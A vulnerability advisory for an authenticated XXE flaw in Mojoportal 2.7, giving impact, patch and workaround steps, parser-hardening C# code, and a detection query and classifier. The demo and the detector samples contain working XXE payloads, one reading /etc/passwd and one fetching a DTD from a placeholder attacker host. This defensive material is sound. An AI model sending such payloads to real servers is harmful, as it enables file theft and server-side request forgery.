CVE-2023-24323
📋 TL;DR
Mojoportal v2.7 contains an XML external entity (XXE) injection vulnerability that is reachable by authenticated users. An attacker with a valid account can make the server's XML parser resolve external entities, which allows reading arbitrary files that the web application's process identity can access and potentially forces the server to issue requests to other hosts (server-side request forgery). All installations of Mojoportal version 2.7 that have not been patched are affected.
💻 Affected Systems
- Mojoportal
📦 What is this software?
Mojoportal is an open-source content management system written in C# for ASP.NET, maintained by the Mojoportal project.
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of sensitive files readable by the application's process identity (configuration files with connection strings, credentials, source code), or SSRF against internal services reachable from the web server, escalating to internal network reconnaissance and further compromise.
Likely Case
Unauthorized file reading of server files containing sensitive information like configuration files, passwords, or source code.
If Mitigated
Limited impact if proper network segmentation, file permissions, and XML parser hardening are implemented.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authentication is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 2.7.0.1 or later
Vendor Advisory: https://www.mojoportal.com/
Restart Required: Yes
Instructions:
1. Back up the current installation (web root and database).
2. Download the latest release from the official site or repository.
3. Replace the vulnerable files with the patched versions.
4. Restart the application (recycle the IIS application pool or restart the web server).
🔧 Temporary Workarounds
Disable XML external entity processing
Configure the XML parser to refuse DTDs and external entities. Mojoportal is an ASP.NET application, so the Java JAXP flags FEATURE_SECURE_PROCESSING and DISALLOW_DOCTYPE_DECL do not apply to it; the .NET equivalents are XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null (and XmlDocument.XmlResolver = null where an XmlDocument is loaded directly from a string or URL). This is a code-level change rather than a configuration switch, so it is a mitigation for deployments built from source.
Restrict authenticated user access
Limit accounts to trusted personnel, remove stale users, and enforce strong authentication controls; the flaw is only reachable after login.
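As an added example (not Mojoportal's own code), the following C# program shows the parser-hardening workaround in .NET terms: one constructed XXE payload is parsed twice, once with permissive XmlReaderSettings, where the external entity is resolved and the referenced file's contents come back as element text, and once with the hardened settings, where the reader rejects the document at the DOCTYPE before any entity is touched. The temp-file path, the file contents and the element names are assumptions made for the demo.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example, not Mojoportal code: the same XXE payload parsed with permissive
// and with hardened XmlReaderSettings. File path and payload are constructed for the demo.
static class XxeDemo
{
    // Constructed stand-in for a sensitive server file (e.g. a config with a connection string).
    public static string WriteSecret()
    {
        string path = Path.Combine(Path.GetTempPath(), "xxe-demo-secret.txt");
        File.WriteAllText(path, "db_password=hunter2");
        return path;
    }

    // Constructed attacker payload: a general entity whose SYSTEM identifier is a file:// URI.
    public static string Payload(string secretPath)
    {
        string uri = new Uri(secretPath).AbsoluteUri;
        return "<?xml version=\"1.0\"?>\n" +
               "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"" + uri + "\"> ]>\n" +
               "<data>&xxe;</data>";
    }

    // Parses with the given settings and returns the text of <data>, or the
    // parser's refusal message when the reader rejects the document.
    public static string Parse(string xml, XmlReaderSettings settings)
    {
        try
        {
            using (XmlReader reader = XmlReader.Create(new StringReader(xml), settings))
            {
                var doc = new XmlDocument();
                doc.Load(reader);          // entity expansion happens inside the reader
                return doc.DocumentElement.InnerText;
            }
        }
        catch (XmlException ex)
        {
            return "rejected: " + ex.Message;
        }
    }

    // Permissive settings: the DTD is parsed and external entities are fetched by XmlUrlResolver.
    public static XmlReaderSettings PermissiveSettings() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Parse,
        XmlResolver = new XmlUrlResolver()
    };

    // Hardened settings: any DOCTYPE is rejected outright, and no resolver is
    // available even for code paths that later re-enable DTD parsing.
    public static XmlReaderSettings HardenedSettings() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Prohibit,
        XmlResolver = null
    };

    static void Main()
    {
        string secret = WriteSecret();
        string xml = Payload(secret);
        Console.WriteLine("permissive: " + Parse(xml, PermissiveSettings()));
        Console.WriteLine("hardened:   " + Parse(xml, HardenedSettings()));
        File.Delete(secret);
    }
}
```

The permissive run prints the secret file's contents as the element text; the hardened run prints the XmlException raised when the reader meets the DOCTYPE. Setting both properties matters: DtdProcessing.Prohibit stops the attack at the declaration, and a null resolver is the backstop if some code path sets DtdProcessing.Parse or DtdProcessing.Ignore.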
🧯 If You Can't Patch
- Implement network segmentation to isolate Mojoportal from sensitive internal systems
- Deploy a web application firewall (WAF) with XXE protection rules
🔍 How to Verify
Check if Vulnerable:
Check if running Mojoportal version 2.7.0.0 or earlier by examining version files or admin panel
Check Version:
Check /version.txt file or admin panel system info
Verify Fix Applied:
Verify installation shows version 2.7.0.1 or later in admin panel or version files
📡 Detection & Monitoring
Log Indicators:
- Unusual XML file uploads or processing
- Multiple file read attempts from authenticated users
- XML parsing errors containing file paths
Network Indicators:
- XML payloads containing external entity references in POST requests
- Unexpected outbound connections from the web server to internal hosts or to the Internet (external DTD or entity fetches)
SIEM Query (Splunk-style; only useful against a source that records request bodies, such as WAF or reverse-proxy logs, because standard IIS access logs hold the URI and method but not the POST body):
source="web_logs" AND (uri_path="*/xml*" OR method="POST") AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*file:*")
Expect noise from "*DOCTYPE*" on its own, since XHTML and SVG uploads carry one; "*ENTITY*" together with "SYSTEM" or "*file:*" is the higher-fidelity match.
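An added example, not from the page or the Mojoportal project: a small C# classifier that scores captured request bodies for XXE indicators and ranks them, so that a routine XHTML upload (which also carries a DOCTYPE and would trip the query above) scores low while an external entity declaration scores high. The sample bodies, indicator names and weights are constructed for the example; the attacker host name is a placeholder.

```csharp
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

// Added detection example (not Mojoportal code). Scores request bodies captured by a
// WAF, reverse proxy or IIS failed-request trace; plain access logs do not carry bodies.
static class XxeDetector
{
    // Indicator name -> (weight, pattern). Weights are assumptions chosen for this demo.
    static readonly Dictionary<string, (int Weight, Regex Pattern)> Indicators =
        new Dictionary<string, (int Weight, Regex Pattern)>
    {
        // Any DOCTYPE at all: weak on its own, XHTML/SVG/DocBook documents carry one too.
        ["doctype"] = (1, new Regex(@"<!DOCTYPE\b", RegexOptions.IgnoreCase)),
        // Entity declared with an external identifier: the core of classic XXE.
        ["external_entity"] = (3, new Regex(@"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", RegexOptions.IgnoreCase)),
        // Parameter entity (% name): the building block of blind / out-of-band XXE.
        ["parameter_entity"] = (2, new Regex(@"<!ENTITY\s+%\s*\w+", RegexOptions.IgnoreCase)),
        // Local-file, loopback or cloud-metadata targets named inside the document.
        ["local_target"] = (2, new Regex(@"file:/|localhost|127\.0\.0\.1|169\.254\.169\.254", RegexOptions.IgnoreCase)),
    };

    // Returns the total score and the names of the indicators that matched.
    public static (int Score, List<string> Hits) Analyze(string body)
    {
        int score = 0;
        var hits = new List<string>();
        foreach (var kv in Indicators)
        {
            if (kv.Value.Pattern.IsMatch(body))
            {
                score += kv.Value.Weight;
                hits.Add(kv.Key);
            }
        }
        return (score, hits);
    }

    // Constructed sample bodies standing in for captured POST payloads.
    static readonly (string Label, string Body)[] Samples =
    {
        ("plain xml",    "<?xml version=\"1.0\"?><site><title>Home</title></site>"),
        ("xhtml upload", "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" " +
                         "\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"><html></html>"),
        ("classic xxe",  "<?xml version=\"1.0\"?><!DOCTYPE d [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>" +
                         "<d>&xxe;</d>"),
        ("blind xxe",    "<!DOCTYPE d [<!ENTITY % dtd SYSTEM \"http://attacker.example/x.dtd\"> %dtd;]><d/>"),
    };

    static void Main()
    {
        foreach (var s in Samples)
        {
            var (score, hits) = Analyze(s.Body);
            // Threshold of 3 means an external entity declaration alone is enough to alert,
            // while a bare DOCTYPE (score 1) is only logged for context.
            string verdict = score >= 3 ? "ALERT" : "info";
            Console.WriteLine($"{verdict,-5} score={score} {s.Label}: {string.Join(",", hits)}");
        }
    }
}
```

The plain document matches nothing, the XHTML body matches only the DOCTYPE indicator, and both XXE bodies cross the alert threshold on the entity declaration alone; the file:// and parameter-entity indicators then tell the analyst whether to expect local file reads or out-of-band traffic to an attacker-controlled DTD host, which ties back to the outbound-connection indicator above.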